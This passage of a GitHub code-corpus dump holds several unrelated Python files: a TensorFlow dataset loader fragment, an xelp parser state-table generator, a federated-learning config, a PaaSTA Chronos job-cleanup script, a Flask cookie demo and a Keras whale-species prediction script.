self.train_features.extend(df[mask][\"path\"].tolist())\n self.train_labels.extend(df[mask][lable_column].tolist())\n self.val_features.extend(df[~mask][\"path\"].tolist())\n self.val_labels.extend(df[~mask][lable_column].tolist())\n print(f\"There are {len(self.train_features)} training images, {len(self.val_features)} validation images\")\n\n def load_from_path_label(self, path, label):\n image = tf.io.read_file(path)\n image = tf.image.decode_jpeg(image, channels=3)\n image = tf.image.resize(image, [self.input_width, self.input_height])\n return tf.cast(image, tf.float64), tf.cast(label, tf.float32)\n\n\ndef random_rotate(image, label):\n rn = tf.random.uniform(shape=(), maxval=4, dtype=tf.int32)\n return tf.image.rot90(image, rn), label\n\n\ndef random_flip(image, label):\n rn = tf.random.uniform(shape=(), maxval=1)\n return tf.cond(rn < 0.5,\n lambda: (image, label),\n lambda: (tf.image.flip_left_right(image), label))","repo_name":"sunzaimei/Carousell","sub_path":"model/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34313582514","text":"#!/usr/bin/env python\nfrom __future__ import print_function #just for parenthesis wrapping in python 2\n\n\"\"\"\nPython based parser state machine generator for xelp\n\nKona F Pance \n\nhistory:\n\treplaces original C hand coded version. manu originally wanted it in C but python is just easier. -kfp\n\n\tnote these are not general purpose state-machines but specifically designed to work the the compact state\n\tmachine parser in xelp.c\n\n\"\"\"\nimport argparse\nimport sys\nimport re\nimport pprint\n\n\"\"\"\nSimple parser state machine has these params per state:\n[current_state] [action-char] [action-flags] [ next-state]\n\nnotes:\n\tthe current-state is not stored. It is addressed via the companion jump table. \n\tthis saves storing redundant state info and improves run-time perf by not checking each state.\n\n\teach state *MUST* have a default catch-all or the run-time parser loop *WILL* hang. 
This is\n\taccomplished by having an action-char of 0 or '\\0'\n\n\texecFlags, parserStates are emitted as #defines in C.\n\n\"\"\" \n\ngLineTokStateMachine = { \n\t\"execFlags\" : [\n\t\t[\"_EF_TS\" ,\t\"(0x01)\", \"set token 0 start (1st token from buf start)\"],\n\t\t[\"_EF_TE\" ,\t\"(0x02)\", \"set token 0 end\" ], \n\t\t[\"_EF_LE\" ,\t\"(0x04)\", \"set line end\" ],\n\t],\n\t\"parserStates\" : [\t # list of state-names. must be in desired order. [\"state-name\",\"C comment\"]\n\t\t[\"_PS_SEEK\", \"seek next token0\"\t\t\t\t\t ],\n\t\t[\"_PS_ESCA\", \"esc sequence\" \t\t\t\t\t ],\n\t\t[\"_PS_TOK0\", \"token0 (the command / operator)\" ],\n\t\t[\"_PS_CMNT\", \"single-line comment\"\t\t\t\t ],\n\t\t[\"_PS_SEOL\", \"seek end-of-line\"\t\t\t\t\t ],\n\t\t[\"_PS_QUOT\", \"quoted string\"\t\t\t\t\t ],\n\t\t[\"_PS_QESC\", \"quoted esc char\"\t\t\t\t\t ],\n\t\t[\"_PS_QEND\", \"quoted end\"\t\t\t\t ],\n\t\t[\"_PS_PREV\", \"use previous state (spec case)\"\t ],\n\t\t[\"_PS_EOS \", \"end of table. actually never used\" ] #this should be last.\n\t],\n\t\"transTableName\" : \"gPSMStates\",\t\n\t\"transTable\" : [\t \n\t\t# state , char , exec , next_state, C comment \n\t\t[\"_PS_SEEK\" ,\" \" \t\t\t, 0, \"_PS_SEEK\", \"space is token separator\" ],\n\t\t[\"_PS_SEEK\" ,\"\\\\t\" , 0, \"_PS_SEEK\", \"tab is also token sep\" ],\n\t\t[\"_PS_SEEK\" ,\"\\\\n\" , 0, \"_PS_SEEK\", \"newline is token sep\" ],\n\t\t[\"_PS_SEEK\" ,\";\" , 0, \"_PS_SEEK\", \"; don't bother with termi if no tokn started\" ],\n\t\t[\"_PS_SEEK\" ,\"XELP_CLI_ESC\" , 0, \"_PS_ESCA\", \"enter CLI escape mode\" ],\n\t\t[\"_PS_SEEK\" ,\"#\" , 0, \"_PS_CMNT\", \"enter single line comment\" ],\n\t\t[\"_PS_SEEK\" ,\"\\\\\\\"\" ,\"_EF_TS\"\t , \"_PS_QUOT\", \"enter quoted string token\"\t\t\t\t ],\n\t\t[\"_PS_SEEK\" ,0\t\t\t ,\"_EF_TS\"\t , \"_PS_TOK0\", \"default .. 
enter token\" ],\n\t\t[\"_PS_ESCA\" ,0 , 0, \"_PS_PREV\", \"any char returns from esc state to pre stte\" ],\n\t\t[\"_PS_TOK0\" ,\" \"\t\t\t,\"_EF_TE\"\t\t , \"_PS_SEOL\", \"end of 1st token\"\t \t\t\t\t\t\t\t],\n\t\t[\"_PS_TOK0\" ,\"\\\\t\"\t\t\t,\"_EF_TE\"\t\t , \"_PS_SEOL\", \"end of 1st token\"\t \t\t\t\t\t\t\t],\n\t\t[\"_PS_TOK0\" ,\"#\"\t\t\t,\"_EF_TE | _EF_LE\" , \"_PS_CMNT\", \"end of line due to commnt, aslo end of token\" ],\n\t\t[\"_PS_TOK0\" ,\";\"\t\t\t,\"_EF_TE | _EF_LE\" , \"_PS_SEEK\", \"end of tok, terminator end of line\" ],\n\t\t[\"_PS_TOK0\" ,\"\\\\n\"\t\t\t,\"_EF_TE | _EF_LE\" , \"_PS_SEEK\", \"end of line, end of line\"\t\t\t\t\t\t],\n\t\t[\"_PS_TOK0\" ,0\t\t\t\t,\t\t\t\t 0, \"_PS_TOK0\", \"keep adding to token\"\t\t\t\t\t\t\t],\n\t\t[\"_PS_CMNT\" ,\"\\\\n\"\t\t\t,\t\t\t\t 0, \"_PS_SEEK\", \"end of line terminates comment\"\t\t\t\t],\n\t\t[\"_PS_CMNT\" ,0\t\t\t\t,\t\t\t\t 0, \"_PS_CMNT\", \"keep eating chars until eol reached\"\t\t\t],\n\t\t[\"_PS_SEOL\" ,\";\" \t\t\t,\"_EF_LE\" , \"_PS_SEEK\", \"end of statement reached\"\t\t\t\t\t\t],\n\t\t[\"_PS_SEOL\" ,\"\\\\n\" \t\t\t,\"_EF_LE\" , \"_PS_SEEK\", \"end of line reached\"\t\t\t\t\t\t\t],\n\t\t[\"_PS_SEOL\" ,\"#\" \t\t\t,\"_EF_LE\" , \"_PS_CMNT\", \"comment start\"\t\t\t\t\t\t\t\t],\n\t\t[\"_PS_SEOL\" ,\"XELP_CLI_ESC\" \t,\t\t\t 0, \"_PS_ESCA\", \"esc char -- skip next char\"\t\t\t\t\t],\n\t\t[\"_PS_SEOL\" ,\"\\\\\\\"\" \t\t,\t\t\t\t 0, \"_PS_QUOT\", \"enter quoted str (uses diff esc, exit states)\"],\n\t\t[\"_PS_SEOL\" ,0 \t\t\t\t,\t\t\t\t 0, \"_PS_SEOL\", \"keep seeking EOL\"\t\t\t\t\t\t\t\t],\n\t\t[\"_PS_QUOT\" ,\"\\\\\\\"\"\t\t\t, 0, \"_PS_QEND\", \"hit end of quote, go to QEND to advnce 1 char\"],\n\t\t[\"_PS_QUOT\" ,\"XELP_QUO_ESC\" , 0, \"_PS_QESC\", \"handle esc inside quoted str\" \t\t\t ], \n\t\t[\"_PS_QUOT\" ,0\t\t\t\t, 0, \"_PS_QUOT\", \"keep going thru quoted string\"\t\t\t\t],\n\t\t[\"_PS_QESC\" ,0 , 0, \"_PS_QUOT\", \"skip over next char (esc'd)\" ],\n\t\t[\"_PS_QEND\" ,\"#\" ,\"_EF_TE | _EF_LE\" , \"_PS_CMNT\", \"exit quote in to comment\" ],\n\t\t[\"_PS_QEND\" ,\";\" ,\"_EF_TE | _EF_LE\" , \"_PS_SEEK\", \"exit quote with terminal\"\t\t\t\t\t\t],\n\t\t[\"_PS_QEND\" ,\"\\\\n\" ,\"_EF_TE | _EF_LE\" , \"_PS_SEEK\", \"exit quote at end of line\"\t\t\t\t\t],\n\t\t[\"_PS_QEND\" ,0 ,\"_EF_TE\" , \"_PS_SEOL\", \"exit quote\"\t\t\t\t\t\t\t\t\t],\n\t\t],\n\t\t\"jumpTableName\" : \"gPSMJumpTable\"\n}\n#*********************************************************************************************************************\ngLineTokStateMachineWBrackets = { \n\t\"execFlags\" : [\n\t\t[\"_EF_TS\" ,\t\"(0x01)\", \"set token 0 start (1st token from buf start)\"],\n\t\t[\"_EF_TE\" ,\t\"(0x02)\", \"set token 0 end\" ], \n\t\t[\"_EF_LE\" ,\t\"(0x04)\", \"set line end\" ],\n\t\t[\"_EF_BS\" , \"(0x08)\", \"set bracket start\" ],\n\t\t[\"_EF_BE\" , \"(0x10)\", \"set bracket end\" ]\n\t\t\t\n\t],\n\t\"parserStates\" : [\t # list of state-names. must be in desired order. 
[\"state-name\",\"C comment\"]\n\t\t[\"_PS_SEEK\", \"seek next token0\"\t\t\t\t\t ],\n\t\t[\"_PS_ESCA\", \"esc sequence\" \t\t\t\t\t ],\n\t\t[\"_PS_TOK0\", \"token0 (the command / operator)\" ],\n\t\t[\"_PS_CMNT\", \"single-line comment\"\t\t\t\t ],\n\t\t[\"_PS_SEOL\", \"seek end-of-line\"\t\t\t\t\t ],\n\t\t[\"_PS_QUOT\", \"quoted string\"\t\t\t\t\t ],\n\t\t[\"_PS_QESC\", \"quoted esc char\"\t\t\t\t\t ],\n\t\t[\"_PS_QEND\", \"quoted end\"\t\t\t\t ],\n\t\t[\"_PS_PREV\", \"use previous state (spec case)\"\t ],\n\t\t[\"_PS_BRKT\", \"bracket\" ],\n\t\t[\"_PS_EOS \", \"end of table. actually never used\" ] #this should be last.\n\t],\n\t\"transTableName\" : \"gPSMStates\",\t\n\t\"transTable\" : [\t \n\t\t# state , char , exec , next_state, C comment \n\t\t[\"_PS_SEEK\" ,\" \" \t\t\t, 0, \"_PS_SEEK\", \"space is token separator\" ],\n\t\t[\"_PS_SEEK\" ,\"\\\\t\" , 0, \"_PS_SEEK\", \"tab is also token sep\" ],\n\t\t[\"_PS_SEEK\" ,\"\\\\n\" , 0, \"_PS_SEEK\", \"newline is token sep\" ],\n\t\t[\"_PS_SEEK\" ,\";\" , 0, \"_PS_SEEK\", \"; don't bother with termi if no tokn started\" ],\n\t\t[\"_PS_SEEK\" ,\"XELP_CLI_ESC\" , 0, \"_PS_ESCA\", \"enter CLI escape mode\" ],\n\t\t[\"_PS_SEEK\" ,\"#\" , 0, \"_PS_CMNT\", \"enter single line comment\" ],\n\t\t[\"_PS_SEEK\" ,\"\\\\\\\"\" ,\"_EF_TS\"\t , \"_PS_QUOT\", \"enter quoted string token\"\t\t\t\t ],\n\t\t[\"_PS_SEEK\" ,\"[\" ,\"_EF_TS | _EF_BS\" , \"_PS_BRKT\", \"enter bracket inc bracket level count\"\t\t],\n\t\t[\"_PS_SEEK\" ,0\t\t\t ,\"_EF_TS\"\t , \"_PS_TOK0\", \"default .. enter token\" ],\n\t\t[\"_PS_ESCA\" ,0 , 0, \"_PS_PREV\", \"any char retrns from esc state to pre state\" ],\n\t\t[\"_PS_BRKT\" ,\"XELP_CLI_ESC\" , 0, \"_PS_ESCA\", \"enter CLI escape mode\" ],\n\t\t[\"_PS_BRKT\" ,\"[\" ,\"_EF_BS\" , \"_PS_BRKT\", \"enter bracket, inc bracket level count\" ],\n\t\t[\"_PS_BRKT\" ,\"]\" ,\"_EF_BE\" , \"_PS_PREV\", \"decrement bracket\" ],\n\t\t[\"_PS_BRKT\" ,0 , 0, \"_PS_BRKT\", \"eat up chars in side bracket\" ],\n\t\t[\"_PS_TOK0\" ,\" \"\t\t\t,\"_EF_TE\"\t\t , \"_PS_SEOL\", \"end of 1st token\"\t \t\t\t\t\t\t\t],\n\t\t[\"_PS_TOK0\" ,\"\\\\t\"\t\t\t,\"_EF_TE\"\t\t , \"_PS_SEOL\", \"end of 1st token\"\t \t\t\t\t\t\t\t],\n\t\t[\"_PS_TOK0\" ,\"#\"\t\t\t,\"_EF_TE | _EF_LE\" , \"_PS_CMNT\", \"end of line due to commnt, aslo end of token\" ],\n\t\t[\"_PS_TOK0\" ,\";\"\t\t\t,\"_EF_TE | _EF_LE\" , \"_PS_SEEK\", \"end of tok, terminator end of line\" ],\n\t\t[\"_PS_TOK0\" ,\"\\\\n\"\t\t\t,\"_EF_TE | _EF_LE\" , \"_PS_SEEK\", \"end of line, end of line\"\t\t\t\t\t\t],\n\t\t[\"_PS_TOK0\" ,0\t\t\t\t,\t\t\t\t 0, \"_PS_TOK0\", \"keep adding to token\"\t\t\t\t\t\t\t],\n\t\t[\"_PS_CMNT\" ,\"\\\\n\"\t\t\t,\t\t\t\t 0, \"_PS_SEEK\", \"end of line terminates comment\"\t\t\t\t],\n\t\t[\"_PS_CMNT\" ,0\t\t\t\t,\t\t\t\t 0, \"_PS_CMNT\", \"keep eating chars until eol reached\"\t\t\t],\n\t\t[\"_PS_SEOL\" ,\";\" \t\t\t,\"_EF_LE\" , \"_PS_SEEK\", \"end of statement reached\"\t\t\t\t\t\t],\n\t\t[\"_PS_SEOL\" ,\"\\\\n\" \t\t\t,\"_EF_LE\" , \"_PS_SEEK\", \"end of line reached\"\t\t\t\t\t\t\t],\n\t\t[\"_PS_SEOL\" ,\"#\" \t\t\t,\"_EF_LE\" , \"_PS_CMNT\", \"comment start\"\t\t\t\t\t\t\t\t],\n\t\t[\"_PS_SEOL\" ,\"XELP_CLI_ESC\" \t,\t\t\t\t 0, \"_PS_ESCA\", \"esc char -- skip next char\"\t\t\t\t\t],\n\t\t[\"_PS_SEOL\" ,\"\\\\\\\"\" \t\t,\t\t\t\t 0, \"_PS_QUOT\", \"enter quoted str (uses diff esc, exit states)\"],\n\t\t[\"_PS_SEOL\" ,0 \t\t\t\t,\t\t\t\t 0, \"_PS_SEOL\", \"keep seeking EOL\"\t\t\t\t\t\t\t\t],\n\t\t[\"_PS_QUOT\" ,\"\\\\\\\"\"\t\t\t, 0, \"_PS_QEND\", \"hit end of quote, 
go to QEND to advnce 1 char\"],\n\t\t[\"_PS_QUOT\" ,\"XELP_QUO_ESC\" , 0, \"_PS_QESC\", \"handle esc inside quoted str\" \t\t\t ], \n\t\t[\"_PS_QUOT\" ,0\t\t\t\t, 0, \"_PS_QUOT\", \"keep going thru quoted string\"\t\t\t\t],\n\t\t[\"_PS_QESC\" ,0 , 0, \"_PS_QUOT\", \"skip over next char (esc'd)\" ],\n\t\t[\"_PS_QEND\" ,\"#\" ,\"_EF_TE | _EF_LE\" , \"_PS_CMNT\", \"exit quote in to comment\" ],\n\t\t[\"_PS_QEND\" ,\";\" ,\"_EF_TE | _EF_LE\" , \"_PS_SEEK\", \"exit quote with terminal\"\t\t\t\t\t\t],\n\t\t[\"_PS_QEND\" ,\"\\\\n\" ,\"_EF_TE | _EF_LE\" , \"_PS_SEEK\", \"exit quote at end of line\"\t\t\t\t\t],\n\t\t[\"_PS_QEND\" ,0 ,\"_EF_TE\" , \"_PS_SEOL\", \"exit quote\"\t\t\t\t\t\t\t\t\t],\n\t\t],\n\t\t\"jumpTableName\" : \"gPSMJumpTable\"\n}\n\n\ndef emitStateMachineFile(fname, smdata):\n\twith open(fname, 'w') as f:\n\t\t#f.write(str(gLineTokStateMachine));\n\t\tp = smdata\n\t\tf.write(\"/**\\n begin parser state machine model.\\n */\\n\")\n\t\t#first write #defines for exec-flags\n\t\tfor i in range(len(p[\"execFlags\"])):\n\t\t\tf.write(\"#define \"+p[\"execFlags\"][i][0]+\" \"+p[\"execFlags\"][i][1]+ \" /* \" + p[\"execFlags\"][i][2] + \" */\\n\")\n\t\tf.write(\"\\n\")\n\n\t\t#write out the #defines for the parser states\n\t\tfor i in range(len(p[\"parserStates\"])):\n\t\t\tf.write(\"#define \"+p[\"parserStates\"][i][0]+\" (0x\"+'%02x'%i +\") /* \" + p[\"parserStates\"][i][1] + \" */\\n\")\n\t\tf.write(\"\\n\")\n\n\t\t#write out table for the state machine transitions.\n\t\t#todo add error checking such as missing default (0) clause in a state\n\t\tf.write(\"static const char \"+ p[\"transTableName\"]+\"[\"+ str(len(p[\"transTable\"])*3+1)+ \"]= {\\n\")\n\t\tsz = 0\n\t\tez = 0\n\t\tcz = 0\n\t\tfor i in range(len(p[\"transTable\"])):\n\t\t\t#print(\"i \" + str(i) + \" : \" + str(p[\"transTable\"][i][0]))\n\t\t\tif len(str(p[\"transTable\"][i][1])) > sz:\n\t\t\t\tsz = len(str(p[\"transTable\"][i][1]))\n\t\t\tif len(str(p[\"transTable\"][i][2])) > ez:\n\t\t\t\tez = len(str(p[\"transTable\"][i][2]))\n\t\t\tif len(str(p[\"transTable\"][i][4])) > cz:\n\t\t\t\tcz = len(str(p[\"transTable\"][i][4]))\n\t\tsz += 2\n\t\tez += 2\n\t\tcz += 2\n\t\tfor i in range(len(p[\"transTable\"])):\n\t\t\tr = p[\"transTable\"][i]\n\t\t\t#f.write(str(r)+\"\\n\")\n\t\t\ts = (sz-len(str(r[1])))*\" \"\n\t\t\te = (ez-len(str(r[2])))*\" \"\n\t\t\tc = (cz-len(str(r[4])))*\" \"\n\t\t\tif ((str(r[1])[0:3] == \"XELP\") or (r[1]==0)):\n\t\t\t\tq=\" \"\n\t\t\telse:\n\t\t\t\tq=\"'\"\n\t\t\tf.write(\"/* \"+r[0]+\" */ \"+q + str(r[1])+q+s + \",\" + str(r[2]) +e+ \",\" + r[3] + \", /*\" + r[4] +c+\" */\\n\")\n\t\tf.write(\" _PS_EOS\\n\")\n\t\tf.write(\"};\\n\\n\")\n\n\t\t#write out jump table\n\t\t\n\t\tstate = \"\"\n\t\tjumpt = []\n\t\tfor i in range(len(p[\"transTable\"])):\n\t\t\tr = p[\"transTable\"][i]\n\t\t\tif r[0] != state:\n\t\t\t\tjumpt.append( [r[0], str(i*3)])\n\t\t\tstate = r[0]\n\t\tf.write(\"char \"+p[\"jumpTableName\"]+\"[\" +str(len(jumpt))+\"]= {\\n\")\n\t\tk = 0\n\t\tfor i in range(len(jumpt)):\n\t\t\tif k< (len(jumpt)-1):\n\t\t\t\tcom = \",\"\n\t\t\telse:\n\t\t\t\tcom = \" \"\n\t\t\tk += 1\n\t\t\tf.write(\" \" + jumpt[i][1] + com + \"/* \"+ jumpt[i][0] + \" */\\n\")\n\t\tf.write(\"};\\n\")\n\ndef main():\n\tparser = argparse.ArgumentParser(description='deftio xelp parser statemachine builder')\n\tparser.add_argument('-p','--psm_tables', help='output file for basic parser state table', required=False, default=\"xelp_psm_tables.c\")\n\tparser.add_argument('-b','--psm_w_brkts', help='output file parser state 
table with brackets support', required=False,default=\"xelp_psm_tables_brkts.c\")\n\n\targs = vars(parser.parse_args())\n\n\t#print(\"xelp state-machine parser table generator\\n\")\n\temitStateMachineFile(args[\"psm_tables\"],gLineTokStateMachine)\n\temitStateMachineFile(args[\"psm_w_brkts\"],gLineTokStateMachineWBrackets)\nif __name__ == '__main__':\n main()\n","repo_name":"deftio/xelp","sub_path":"tools/xelp_parser_sm_gen.py","file_name":"xelp_parser_sm_gen.py","file_ext":"py","file_size_in_byte":12884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"44235098678","text":"fmnist_noise_baseline_config = {\n \"partition\": \"homo\",\n \"round\": 50,\n \"network\": \"simple-cnn\",\n \"sample_ratio\": 1,\n \"dataset\": \"fmnist\",\n \"total_client_num\": 10,\n \"lr\": 0.01,\n \"momentum\": 0.9,\n \"weight_decay\": 1e-5,\n \"batch_size\": 64,\n \"test_batch_size\": 32,\n \"epochs\": 10\n}\n","repo_name":"SMILELab-FL/FedLab-benchmarks","sub_path":"fedlab_benchmarks/feature-skew-fedavg/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"67"} +{"seq_id":"10913928801","text":"import argparse\nimport datetime\nimport sys\n\nimport dateutil.parser\nimport pysensu_yelp\n\nfrom paasta_tools import chronos_tools\nfrom paasta_tools import monitoring_tools\nfrom paasta_tools import utils\nfrom paasta_tools.check_chronos_jobs import check_chronos_job_name\nfrom paasta_tools.utils import InvalidJobNameError\nfrom paasta_tools.utils import NoConfigurationForServiceError\nfrom paasta_tools.utils import paasta_print\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Cleans up stale chronos jobs.')\n parser.add_argument(\n '-d', '--soa-dir', dest=\"soa_dir\", metavar=\"SOA_DIR\",\n default=chronos_tools.DEFAULT_SOA_DIR,\n help=\"define a different soa config directory\",\n )\n args = parser.parse_args()\n return args\n\n\ndef execute_chronos_api_call_for_job(api_call, job):\n \"\"\"Attempt a call to the Chronos api, catching any exception.\n\n We *have* to catch Exception, because the client catches\n the more specific exception thrown by the http clients\n and rethrows an Exception -_-.\n\n The chronos api returns a 204 No Content when the delete is\n successful, and chronos-python only returns the body of the\n response from all http calls. 
So, if this is successful,\n then None will be returned.\n https://github.com/asher/chronos-python/pull/7\n\n We catch it here, so that the other deletes are completed.\n \"\"\"\n try:\n return api_call(job)\n except Exception as e:\n return e\n\n\ndef cleanup_jobs(client, jobs):\n \"\"\"Maps a list of jobs to cleanup to a list of response objects (or exception objects) from the api\"\"\"\n return [(job, execute_chronos_api_call_for_job(client.delete, job)) for job in jobs]\n\n\ndef cleanup_tasks(client, jobs):\n \"\"\"Maps a list of tasks to cleanup to a list of response objects (or exception objects) from the api\"\"\"\n return [(job, execute_chronos_api_call_for_job(client.delete_tasks, job)) for job in jobs]\n\n\ndef format_list_output(title, job_names):\n return '{}\\n {}'.format(title, '\\n '.join(job_names))\n\n\ndef deployed_job_names(client):\n return [job['name'] for job in client.list()]\n\n\ndef filter_paasta_jobs(jobs):\n \"\"\"\n Given a list of job name strings, return only those in the format PaaSTA expects.\n\n :param jobs: a list of job names.\n :returns: those job names in a format PaaSTA expects\n \"\"\"\n formatted = []\n for job in jobs:\n try:\n # attempt to decompose it\n service, instance = chronos_tools.decompose_job_id(job)\n formatted.append(job)\n except InvalidJobNameError:\n pass\n return formatted\n\n\ndef filter_tmp_jobs(job_names):\n \"\"\"\n filter temporary jobs created by chronos_rerun\n \"\"\"\n return [name for name in job_names if name.startswith(chronos_tools.TMP_JOB_IDENTIFIER)]\n\n\ndef filter_expired_tmp_jobs(client, job_names, cluster, soa_dir):\n \"\"\"\n Given a list of temporary jobs, find those ready to be removed. Their\n suitability for removal is defined by two things:\n\n - the job has completed (irrespective of whether it was a success or\n failure)\n - the job completed more than 24 hours ago\n \"\"\"\n expired = []\n for job_name in job_names:\n service, instance = chronos_tools.decompose_job_id(job_name)\n temporary_jobs = chronos_tools.get_temporary_jobs_for_service_instance(\n client=client,\n service=service,\n instance=instance,\n )\n for job in temporary_jobs:\n last_run_time, last_run_state = chronos_tools.get_status_last_run(job)\n try:\n chronos_job_config = chronos_tools.load_chronos_job_config(\n service=service,\n instance=instance,\n cluster=cluster,\n soa_dir=soa_dir,\n )\n interval = chronos_job_config.get_schedule_interval_in_seconds() or 0\n except NoConfigurationForServiceError:\n # If we can't get the job's config, default to cleanup after 1 day\n interval = 0\n if last_run_state != chronos_tools.LastRunState.NotRun:\n if ((datetime.datetime.now(dateutil.tz.tzutc()) -\n dateutil.parser.parse(last_run_time)) >\n max(datetime.timedelta(seconds=interval), datetime.timedelta(days=1))):\n expired.append(job_name)\n return expired\n\n\ndef main():\n\n args = parse_args()\n soa_dir = args.soa_dir\n\n config = chronos_tools.load_chronos_config()\n client = chronos_tools.get_chronos_client(config)\n\n system_paasta_config = utils.load_system_paasta_config()\n cluster = system_paasta_config.get_cluster()\n\n running_jobs = set(deployed_job_names(client))\n\n expected_service_jobs = {chronos_tools.compose_job_id(*job) for job in\n chronos_tools.get_chronos_jobs_for_cluster(soa_dir=args.soa_dir)}\n\n all_tmp_jobs = set(filter_tmp_jobs(filter_paasta_jobs(running_jobs)))\n expired_tmp_jobs = set(filter_expired_tmp_jobs(client, all_tmp_jobs, cluster=cluster, soa_dir=soa_dir))\n valid_tmp_jobs = all_tmp_jobs - expired_tmp_jobs\n\n 
to_delete = running_jobs - expected_service_jobs - valid_tmp_jobs\n\n task_responses = cleanup_tasks(client, to_delete)\n task_successes = []\n task_failures = []\n for response in task_responses:\n if isinstance(response[-1], Exception):\n task_failures.append(response)\n else:\n task_successes.append(response)\n\n job_responses = cleanup_jobs(client, to_delete)\n job_successes = []\n job_failures = []\n for response in job_responses:\n if isinstance(response[-1], Exception):\n job_failures.append(response)\n else:\n job_successes.append(response)\n try:\n (service, instance) = chronos_tools.decompose_job_id(response[0])\n monitoring_tools.send_event(\n check_name=check_chronos_job_name(service, instance),\n service=service,\n overrides={},\n soa_dir=soa_dir,\n status=pysensu_yelp.Status.OK,\n output=\"This instance was removed and is no longer supposed to be scheduled.\",\n )\n except InvalidJobNameError:\n # If we deleted some bogus job with a bogus jobid that could not be parsed,\n # Just move on, no need to send any kind of paasta event.\n pass\n\n if len(to_delete) == 0:\n paasta_print('No Chronos Jobs to remove')\n else:\n if len(task_successes) > 0:\n paasta_print(format_list_output(\n \"Successfully Removed Tasks (if any were running) for:\",\n [job[0] for job in task_successes],\n ))\n\n # if there are any failures, print and exit appropriately\n if len(task_failures) > 0:\n paasta_print(format_list_output(\"Failed to Delete Tasks for:\", [job[0] for job in task_failures]))\n\n if len(job_successes) > 0:\n paasta_print(format_list_output(\"Successfully Removed Jobs:\", [job[0] for job in job_successes]))\n\n # if there are any failures, print and exit appropriately\n if len(job_failures) > 0:\n paasta_print(format_list_output(\"Failed to Delete Jobs:\", [job[0] for job in job_failures]))\n\n if len(job_failures) > 0 or len(task_failures) > 0:\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"eric-erki/An-open-distributed-platform-as-a-service","sub_path":"paasta_tools/cleanup_chronos_jobs.py","file_name":"cleanup_chronos_jobs.py","file_ext":"py","file_size_in_byte":7556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10401018503","text":"from flask import Flask,request,Response\r\n\r\napp=Flask(__name__)\r\n\r\n@app.route('/cookie_set')\r\ndef cookieSet():\r\n res=Response(\"CooKie Setting\")\r\n res.set_cookie(\"Name\",\"Cookie Test\")\r\n\r\n return res\r\n\r\n@app.route('/cookie_out')\r\ndef cout():\r\n res = Response('Cookie Delete')\r\n res.set_cookie('Name',expires=0)\r\n\r\n return res\r\n@app.route('/cookie_status')\r\ndef cstatus():\r\n return \"Name's Value = %s\"%request.cookies.get('Name','') \r\n\r\nif __name__=='__main__':\r\n app.run()\r\n \r\n","repo_name":"mina0502/Project","sub_path":"WebPrograminig_Py/Web_ex23/ex23_1.py","file_name":"ex23_1.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71030648535","text":"# These library are for data manipulation \nimport numpy as np\nimport pandas as pd\n\n# These library are for working with directories\nimport os\nfrom glob import glob\nfrom tqdm import tqdm\n\n# These library are for Visualization\nimport matplotlib.pyplot as plt\nimport plotly.express as px\nfrom PIL import Image\nimport argparse\n# These library are for the Dataset\nfrom sklearn.model_selection import train_test_split\nfrom datetime import datetime\n# These 
# These libraries are for converting label encodings\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import OneHotEncoder\n\n# These libraries are for loading the model\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.applications.imagenet_utils import preprocess_input\nfrom tensorflow import keras\nimport os\nimport sys\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n\ndef prepare_labels(y):\n values = np.array(y)\n label_encoder = LabelEncoder()\n integer_encoded = label_encoder.fit_transform(values)\n onehot_encoder = OneHotEncoder(sparse=False)\n integer_encoded = integer_encoded.reshape(len(integer_encoded), 1)\n onehot_encoded = onehot_encoder.fit_transform(integer_encoded)\n y = onehot_encoded\n return y, label_encoder\n\ndef main():\n\n parser = argparse.ArgumentParser(description=\"Predict the whale species for a given image.\")\n parser.add_argument(\n \"--image_path\",\n type=str,\n help=\"The path to the image file.\",\n )\n parser.add_argument(\n \"--model_path\",\n default=\"Saved_models/model.h5\",\n type=str,\n help=\"The path to the model chosen. Default: `Saved_models/model.h5`.\",\n )\n opt = parser.parse_args()\n START_DATETIME = datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n\n path=os.getcwd() \n\n X_train = np.zeros((1, 32, 32, 3))\n img = image.load_img(opt.image_path,target_size=(32, 32, 3))\n X = image.img_to_array(img)\n X = preprocess_input(X)\n X_train[0] = X\n X_train /= 255\n model = keras.models.load_model(opt.model_path)\n\n \n predictions=model.predict(np.array(X_train), verbose=1)\n\n\n path_traindata = path+'/csv/train.csv'\n train_df = pd.read_csv(path_traindata)\n train_df = train_df.drop_duplicates(subset=['individual_id'],keep='last')\n y, label_encoder = prepare_labels(train_df['individual_id'])\n \n for i, pred in enumerate(predictions):\n # take the top-5 class indices and decode the best one\n p = pred.argsort()[-5:][::-1]\n prediction_got = label_encoder.inverse_transform(p)[0]\n\n y_result=train_df.loc[(train_df[\"individual_id\"]==prediction_got)]\n\n print(\"The species that the model has predicted is: \",y_result[\"species\"].to_string(index=False))\n\n \n\n\n\nif __name__ == '__main__':\n main()","repo_name":"dksath/whale_competition","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"}
